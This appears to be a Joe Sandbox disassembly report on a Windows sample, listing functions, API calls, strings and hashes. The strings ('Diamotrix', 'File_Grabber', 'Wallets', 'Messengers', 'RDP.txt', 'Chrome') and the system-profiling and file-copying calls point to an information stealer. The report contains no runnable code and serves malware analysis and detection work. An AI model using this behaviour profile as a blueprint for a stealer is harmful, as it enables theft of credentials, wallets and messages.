Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Directory$CreateCurrent$FileFindFirstFolderPath
String ID: Diamotrix$Ex0Z$File_Grabber$GDU1CAMRFRsZKUklCBwfBgYIGDUVCQ4AEw==$GDUFBBwXHRscGDUtAgwVHkkrMAYTDAgRLjUUIR8EAQsW$IQQOBwY=$MAwMHQ==$MRoEHzAQEx0ZZ10=$MRoEHzAQEx0ZZ1o=$MRoEHzAQEx0ZZ1s=$Messengers$MwwDGwYRBQ==$RDP.txt$Wallets$\File_Grabber$\Messengers$\Wallets$nfo.txt
API String ID: 2602529875-1265026603
Opcode ID: f03e0394297efdcfb9fee5656acbe66687bd17c58800006372adf50f4d704cea
Instruction ID: 5703ef6947dc012f302c01fc1605f295aaab742ddf0ee88821a7225cbc00148f
Opcode Fuzzy Hash: f03e0394297efdcfb9fee5656acbe66687bd17c58800006372adf50f4d704cea
Instruction Fuzzy Hash: 60E2B163E18BC683EB00EB64D4400ADA361FFD9794F905326FAAD529D9DFACE540C790

Function 00007FF7F132FA1C Relevance: 37.1, APIs: 13, Strings: 8, Instructions: 380
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7F1330B3C: GetWindowsDirectoryA.KERNEL32 ref: 00007FF7F1330B6C
Part of subcall function 00007FF7F1330B3C: GetVolumeInformationA.KERNELBASE ref: 00007FF7F1330BBA
Part of subcall function 00007FF7F1330B3C: wsprintfA.USER32 ref: 00007FF7F1330C18

SetCurrentDirectoryW.KERNELBASE ref: 00007FF7F132FADB
CreateDirectoryW.KERNELBASE ref: 00007FF7F132FAF1
SetCurrentDirectoryW.KERNELBASE ref: 00007FF7F132FB3A
SetCurrentDirectoryW.KERNEL32 ref: 00007FF7F132FB51
CreateDirectoryW.KERNELBASE ref: 00007FF7F132FB60
SetCurrentDirectoryW.KERNELBASE ref: 00007FF7F132FB8D
SetCurrentDirectoryW.KERNELBASE ref: 00007FF7F132FC83
CreateDirectoryW.KERNELBASE ref: 00007FF7F132FC92
SetCurrentDirectoryW.KERNELBASE ref: 00007FF7F132FCBC

Part of subcall function 00007FF7F12906C4: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7F12907A2

SetCurrentDirectoryW.KERNELBASE ref: 00007FF7F132FD18

Part of subcall function 00007FF7F132D5F4: GdiplusStartup.GDIPLUS ref: 00007FF7F132D62B
Part of subcall function 00007FF7F132D5F4: GetSystemMetrics.USER32 ref: 00007FF7F132D633
Part of subcall function 00007FF7F132D5F4: GetSystemMetrics.USER32 ref: 00007FF7F132D63D
Part of subcall function 00007FF7F132D5F4: GdiplusShutdown.GDIPLUS ref: 00007FF7F132D691

Part of subcall function 00007FF7F132E23C: GetSystemInfo.KERNELBASE ref: 00007FF7F132E29F
Part of subcall function 00007FF7F132E23C: GlobalMemoryStatusEx.KERNELBASE ref: 00007FF7F132E2D4
Part of subcall function 00007FF7F132E23C: GetUserDefaultUILanguage.KERNELBASE ref: 00007FF7F132E2DA
Part of subcall function 00007FF7F132E23C: GetDesktopWindow.USER32 ref: 00007FF7F132E2E0
Part of subcall function 00007FF7F132E23C: GetClientRect.USER32 ref: 00007FF7F132E2EE
Part of subcall function 00007FF7F132E23C: GetUserNameA.ADVAPI32 ref: 00007FF7F132E30C
Part of subcall function 00007FF7F132E23C: GetComputerNameA.KERNEL32 ref: 00007FF7F132E327
Part of subcall function 00007FF7F132E23C: GetVersionExA.KERNEL32 ref: 00007FF7F132E334
Part of subcall function 00007FF7F132E23C: GetCurrentHwProfileA.ADVAPI32 ref: 00007FF7F132E341
Part of subcall function 00007FF7F132E23C: GetModuleFileNameA.KERNEL32 ref: 00007FF7F132E356

GetSystemMetrics.USER32 ref: 00007FF7F132FE07
CreateDirectoryW.KERNELBASE ref: 00007FF7F132FE96
SetCurrentDirectoryW.KERNELBASE ref: 00007FF7F132FEE6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F13300B3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F13300B9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F13300BF

Strings

\Messengers, xrefs: 00007FF7F132FC98
\Wallets, xrefs: 00007FF7F132FB66
nfo.txt, xrefs: 00007FF7F132FD8D
File_Grabber, xrefs: 00007FF7F132FE8F
Wallets, xrefs: 00007FF7F132FB59
RDP.txt, xrefs: 00007FF7F132FE16
Messengers, xrefs: 00007FF7F132FC8B
\File_Grabber, xrefs: 00007FF7F132FE9C

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: Directory$Current$CreateSystem$MetricsName_invalid_parameter_noinfo_noreturn$GdiplusUser$ClientComputerConcurrency::cancel_current_taskDefaultDesktopFileGlobalInfoInformationLanguageMemoryModuleProfileRectShutdownStartupStatusVersionVolumeWindowWindowswsprintf
String ID: File_Grabber$Messengers$RDP.txt$Wallets$\File_Grabber$\Messengers$\Wallets$nfo.txt
API String ID: 3063786011-3067865950
Opcode ID: 439549d16cabb2dd88bfd4b447fe32fc0201ec5a38c8ef1c6304f43afd5e4987
Instruction ID: 1bdd15f5acfff83b571b14e87db51bb886969668719cb3d4730305d1f13592b0
Opcode Fuzzy Hash: 439549d16cabb2dd88bfd4b447fe32fc0201ec5a38c8ef1c6304f43afd5e4987
Instruction Fuzzy Hash: AB12C363E18AC296EB00EF74D8500EDA371FF90758F901236EA6D529E9DFB8D584C790

Function 00007FF7F12B3E20 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 152
libraryloadernetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32 ref: 00007FF7F12B3E48
WSACleanup.WS2_32 ref: 00007FF7F12B3E63
GetModuleHandleA.KERNEL32 ref: 00007FF7F12B3EAC
GetProcAddress.KERNEL32 ref: 00007FF7F12B3EE0
LoadLibraryA.KERNEL32 ref: 00007FF7F12B3F1E
GetProcAddress.KERNEL32 ref: 00007FF7F12B3F3B
LoadLibraryExA.KERNELBASE ref: 00007FF7F12B3F51
GetSystemDirectoryA.KERNEL32 ref: 00007FF7F12B3F67
GetSystemDirectoryA.KERNEL32 ref: 00007FF7F12B3F93
LoadLibraryA.KERNEL32 ref: 00007FF7F12B4002
GetProcAddress.KERNEL32 ref: 00007FF7F12B4042
QueryPerformanceFrequency.KERNEL32 ref: 00007FF7F12B4081

Strings

AddDllDirectory, xrefs: 00007FF7F12B3F31
kernel32, xrefs: 00007FF7F12B3E9B
if_nametoindex, xrefs: 00007FF7F12B4038
iphlpapi.dll, xrefs: 00007FF7F12B3EE6
LoadLibraryExA, xrefs: 00007FF7F12B3ECE

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: AddressLibraryLoadProc$DirectorySystem$CleanupFrequencyHandleModulePerformanceQueryStartup
String ID: AddDllDirectory$LoadLibraryExA$if_nametoindex$iphlpapi.dll$kernel32
API String ID: 263636572-2794540096
Opcode ID: 203f77c75b130e58b60de629065e69e61a1046895526e1403796fad7fc1493ba
Instruction ID: 32540666f92ad461517cc36537308644fd86e461e21539f7dc005ac953e8d119
Opcode Fuzzy Hash: 203f77c75b130e58b60de629065e69e61a1046895526e1403796fad7fc1493ba
Instruction Fuzzy Hash: 7E61B521B0C6C682FB64FB59A4443B9A791BF49B80FC84034DD6E833D5EFACE00593A0

Function 00007FF7F1330138 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 310
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE ref: 00007FF7F133019B
CreateDirectoryW.KERNEL32 ref: 00007FF7F13303D2
CopyFileW.KERNEL32 ref: 00007FF7F1330501
FindNextFileW.KERNELBASE ref: 00007FF7F13305B4
FindClose.KERNELBASE ref: 00007FF7F13305C5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F13305F9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F13305FF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F1330605

Part of subcall function 00007FF7F128F840: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F128F89B

Strings

\*.*, xrefs: 00007FF7F1330172

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$FileFind$CloseCopyCreateDirectoryFirstNext
String ID: \*.*
API String ID: 1453831035-1173974218
Opcode ID: 4fcc55e0a014fdbd900b34abe555f67c845752b6d4535b633dbd074b0a4f6076
Instruction ID: c8feca0a1394dbab3191acc862defc28842d935ab0f1baa28523fd1fa9364f85
Opcode Fuzzy Hash: 4fcc55e0a014fdbd900b34abe555f67c845752b6d4535b633dbd074b0a4f6076
Instruction Fuzzy Hash: 49D1FC72B18A8196EB10EB74D4403EDB360FF44794F805236EA6D93AD9DFB8D684C350

Function 00007FF7F129D690 Relevance: 15.4, APIs: 10, Instructions: 364
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83a38fbdad7adf8659530e20145e2e1a13004aa8084da6f4a92534fafecafdf5
Instruction ID: 45f13a2858bd3e9edd8c5a2e8d06684b7c136e5e74db782ace092aacff36ff4b
Opcode Fuzzy Hash: 83a38fbdad7adf8659530e20145e2e1a13004aa8084da6f4a92534fafecafdf5
Instruction Fuzzy Hash: 7FE1D632B0868682EB54AB59E4507BAE7A1FF44794FC00035EE5D83AD4DFBCE440EB90

Function 00007FF7F132773C Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 335
timeCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF7F1327781

Part of subcall function 00007FF7F13270D4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F13270E8

Part of subcall function 00007FF7F131B6E0: RtlFreeHeap.NTDLL(?,?,?,00007FF7F1324076,?,?,?,00007FF7F13243F3,?,?,00000000,00007FF7F1324A8D,?,?,?,00007FF7F13249BF), ref: 00007FF7F131B6F6
Part of subcall function 00007FF7F131B6E0: GetLastError.KERNEL32(?,?,?,00007FF7F1324076,?,?,?,00007FF7F13243F3,?,?,00000000,00007FF7F1324A8D,?,?,?,00007FF7F13249BF), ref: 00007FF7F131B700

Part of subcall function 00007FF7F1303258: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7F1303207,?,?,?,?,00000000,00007FF7F13030F2), ref: 00007FF7F1303261
Part of subcall function 00007FF7F1303258: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7F1303207,?,?,?,?,00000000,00007FF7F13030F2), ref: 00007FF7F1303286

_get_daylight.LIBCMT ref: 00007FF7F1327770

Part of subcall function 00007FF7F1327134: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F1327148

_get_daylight.LIBCMT ref: 00007FF7F13279E6
_get_daylight.LIBCMT ref: 00007FF7F13279F7
_get_daylight.LIBCMT ref: 00007FF7F1327A08
GetTimeZoneInformation.KERNELBASE ref: 00007FF7F1327A2F

Strings

Eastern Standard Time, xrefs: 00007FF7F1327AD5
Eastern Summer Time, xrefs: 00007FF7F1327AED

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 4070488512-239921721
Opcode ID: a33450d96af1aa2e880c706dc29fa5b9d6af31b85af25cd50543b27ca5e56a2e
Instruction ID: 1d5e78ec56087e0f7f40103f40b6d4551a3402952ce32e9049fde2e404b851dd
Opcode Fuzzy Hash: a33450d96af1aa2e880c706dc29fa5b9d6af31b85af25cd50543b27ca5e56a2e
Instruction Fuzzy Hash: CBD1CF22A0828287EB24FF25D8515B9A761FFA5794F81803DEA6D476C5DFBCF441C3A0

Function 00007FF7F1311ED0 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7F1311A90: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F1311AD1
Part of subcall function 00007FF7F1311A90: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F1311B4F
Part of subcall function 00007FF7F1311A90: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F1311BA0

CreateFileW.KERNELBASE ref: 00007FF7F1311FD6
CreateFileW.KERNEL32 ref: 00007FF7F1312026
GetLastError.KERNEL32 ref: 00007FF7F1312056
GetFileType.KERNELBASE ref: 00007FF7F131206B
GetLastError.KERNEL32 ref: 00007FF7F1312075
CloseHandle.KERNEL32 ref: 00007FF7F13120A8
CloseHandle.KERNEL32 ref: 00007FF7F131220B
CreateFileW.KERNEL32 ref: 00007FF7F1312240
GetLastError.KERNEL32 ref: 00007FF7F131224F

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: fd34c9500abfcdaeb8b281bdda49ef4c881943f8d7a5923bb274d341d9b2ca53
Instruction ID: dd449706726795b3b04b6dc7ab4a0c2c20d12a5704c9a2feab9fabf3dc3c30c9
Opcode Fuzzy Hash: fd34c9500abfcdaeb8b281bdda49ef4c881943f8d7a5923bb274d341d9b2ca53
Instruction Fuzzy Hash: 8AC1C036B18A4186EB50EF65C4906AC7761FB49BA8F510339DE2EA73D4CF78E055C390

Function 00007FF7F13306C8 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 186
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE ref: 00007FF7F1330722
CreateDirectoryW.KERNEL32 ref: 00007FF7F1330825
CopyFileW.KERNEL32 ref: 00007FF7F133086F
FindNextFileW.KERNEL32 ref: 00007FF7F13308EA
FindClose.KERNEL32 ref: 00007FF7F13308FB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F1330996

Strings

., xrefs: 00007FF7F1330A41

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: FileFind$CloseCopyCreateDirectoryFirstNext_invalid_parameter_noinfo_noreturn
String ID: .
API String ID: 3705515249-248832578
Opcode ID: 413fab0995a673023f21fbb1f280d7141dad5b4c36602a17f107362addef8a12
Instruction ID: f76446d7fc6f64fc3ce0695eda28e911f16ef730e13adf18781f1854c0ad773e
Opcode Fuzzy Hash: 413fab0995a673023f21fbb1f280d7141dad5b4c36602a17f107362addef8a12
Instruction Fuzzy Hash: ED71FA22B1864192EB10EB64D4501ADB371FF84794FC04235EABD87AE9DFBDD604C794

Function 00007FF7F13309A4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32 ref: 00007FF7F1330A18

Strings

., xrefs: 00007FF7F1330A2B

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: FileFindFirst
String ID: .
API String ID: 1974802433-248832578
Opcode ID: b8c23b5692b34cac17de8e90af550be74194995407c4cd79832b65e7be966abf
Instruction ID: 815f751769225cb86ba97e4cad979d569186d4b3cbc652a4dc09a760bd7f4fa1
Opcode Fuzzy Hash: b8c23b5692b34cac17de8e90af550be74194995407c4cd79832b65e7be966abf
Instruction Fuzzy Hash: 3641D622614682C6EB21EF24D4402B9B3B1FF44B94FD48235DA6D436D4EFBDD646D3A0

Function 00007FF7F13279B8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF7F13279E6

Part of subcall function 00007FF7F1327134: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F1327148

_get_daylight.LIBCMT ref: 00007FF7F13279F7

Part of subcall function 00007FF7F13270D4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F13270E8

_get_daylight.LIBCMT ref: 00007FF7F1327A08

Part of subcall function 00007FF7F1327104: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F1327118

Part of subcall function 00007FF7F131B6E0: RtlFreeHeap.NTDLL(?,?,?,00007FF7F1324076,?,?,?,00007FF7F13243F3,?,?,00000000,00007FF7F1324A8D,?,?,?,00007FF7F13249BF), ref: 00007FF7F131B6F6
Part of subcall function 00007FF7F131B6E0: GetLastError.KERNEL32(?,?,?,00007FF7F1324076,?,?,?,00007FF7F13243F3,?,?,00000000,00007FF7F1324A8D,?,?,?,00007FF7F13249BF), ref: 00007FF7F131B700

GetTimeZoneInformation.KERNELBASE ref: 00007FF7F1327A2F

Strings

Eastern Standard Time, xrefs: 00007FF7F1327AD5
Eastern Summer Time, xrefs: 00007FF7F1327AED

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 3458911817-239921721
Opcode ID: 5d4c3bf6b6aaf0ba4b5468b8752146ec1e6801c405154a876208c51c19d7efd6
Instruction ID: 7dd8f206a9baa6ce83abda386ee1bfec13b7ac4056ef7c70395babe1c9c393f2
Opcode Fuzzy Hash: 5d4c3bf6b6aaf0ba4b5468b8752146ec1e6801c405154a876208c51c19d7efd6
Instruction Fuzzy Hash: 5B51AE32A0828287E714FF21E8914A9A760BF59784F81913DEA6D437D6DFBCF40087E0

Function 00007FF7F1330CD8 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 228COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F1330C3C: SHGetFolderPathW.SHELL32 ref: 00007FF7F1330C6C

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F1331102

Strings

Chrome, xrefs: 00007FF7F133107C

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: FolderPath_invalid_parameter_noinfo_noreturn
String ID: Chrome
API String ID: 2457504600-4269441498
Opcode ID: 025a7543dcaefcd56463fb449fdd73668f18795f957d96d6e010195b199e1f01
Instruction ID: 8b45fe000453fed86ca6725dff3b9423ab03300f2d37d4738ba0649ef9afa14b
Opcode Fuzzy Hash: 025a7543dcaefcd56463fb449fdd73668f18795f957d96d6e010195b199e1f01
Instruction Fuzzy Hash: 56C1C8A2E14BC6C6E700EB35D8415F5A3A1FFA5344F91633AE9AC525A5DFBCE180C390

Function 00007FF7F12B63A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F12ED920: ioctlsocket.WS2_32 ref: 00007FF7F12ED939

recv.WS2_32 ref: 00007FF7F12B6421

Strings

cf_socket_shutdown(%qd), xrefs: 00007FF7F12B63D6

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ioctlsocketrecv
String ID: cf_socket_shutdown(%qd)
API String ID: 2464938158-3341341643
Opcode ID: 3564b6c4b1e63f81f7ad3baa9cb07198358acca60385551eba4acc3a7f55c14b
Instruction ID: 63812a873e3e5f79d09869a023c5de1a11c8f9438ef9e9ad398bf276dd2bea63
Opcode Fuzzy Hash: 3564b6c4b1e63f81f7ad3baa9cb07198358acca60385551eba4acc3a7f55c14b
Instruction Fuzzy Hash: 4C11E961B089C281EB60EB65E4103A5A7A1FF48B98FD44231CF7C477C5DF6CD0428754

Function 00007FF7F129C824 Relevance: 2.8, Strings: 2, Instructions: 318COMMON

Download Yara Rule

Strings

Resolving timed out after %lld milliseconds, xrefs: 00007FF7F129D21C
operation aborted by pre-request callback, xrefs: 00007FF7F129C883

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID:
String ID: Resolving timed out after %lld milliseconds$operation aborted by pre-request callback
API String ID: 0-247252918
Opcode ID: 99bbcce2f50605d7cfe9c0f9af8885c8a63b67e3c0ec2013374b87cd621a2a9e
Instruction ID: 2bcfde1f40c0573b1304b59fe944cf911a9d1d9ad3d15c56369067915522940f
Opcode Fuzzy Hash: 99bbcce2f50605d7cfe9c0f9af8885c8a63b67e3c0ec2013374b87cd621a2a9e
Instruction Fuzzy Hash: C7D18671B0868641FB14BBAD94502B9A3A0FF45B98FC45135CE2D876D5DFBCE440E3A0

Function 00007FF7F129CDD2 Relevance: 1.6, Strings: 1, Instructions: 339COMMON

Download Yara Rule

Strings

Resolving timed out after %lld milliseconds, xrefs: 00007FF7F129D21C

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: CounterPerformanceQuery
String ID: Resolving timed out after %lld milliseconds
API String ID: 2783962273-1439975193
Opcode ID: bdf21a975d96782dadc5c432ecb92f77df1112ed0731fe6454f5ee1efa9b6b94
Instruction ID: 7f6cb38e43f7db90119fb92c82381865f7d91d4bdda9cf570cfbaddd8c383cfc
Opcode Fuzzy Hash: bdf21a975d96782dadc5c432ecb92f77df1112ed0731fe6454f5ee1efa9b6b94
